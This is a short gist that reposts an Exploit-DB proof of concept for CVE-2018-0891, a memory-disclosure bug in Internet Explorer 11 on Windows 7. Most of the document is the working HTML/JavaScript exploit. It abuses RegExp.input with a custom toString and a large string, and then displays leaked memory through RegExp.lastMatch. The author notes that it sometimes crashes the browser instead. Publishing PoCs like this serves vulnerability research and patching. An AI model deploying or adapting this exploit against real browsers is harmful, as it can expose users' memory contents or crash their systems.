@blackout314
Created March 20, 2018 15:31
CVE-2018-0891
/*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.
This was tested on IE11 running on Windows 7 64-bit with the latest patches applied.
PoC:
=========================================
*/
<!-- saved from url=(0014)about:internet -->
<script>
function main() {
  RegExp.input = {toString: f};
  alert(RegExp.lastMatch);
}

var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");

function f() {
  String.prototype.match.call(input, "bbbbbbbbbb");
}

main();
</script>
/*
=========================================
https://www.exploit-db.com/exploits/44312/?rss&utm_source=dlvr.it&utm_medium=twitter
Note that sometimes the PoC results in a crash (I made no attempt to make it reliable), while sometimes it results in pieces of memory being displayed.
*/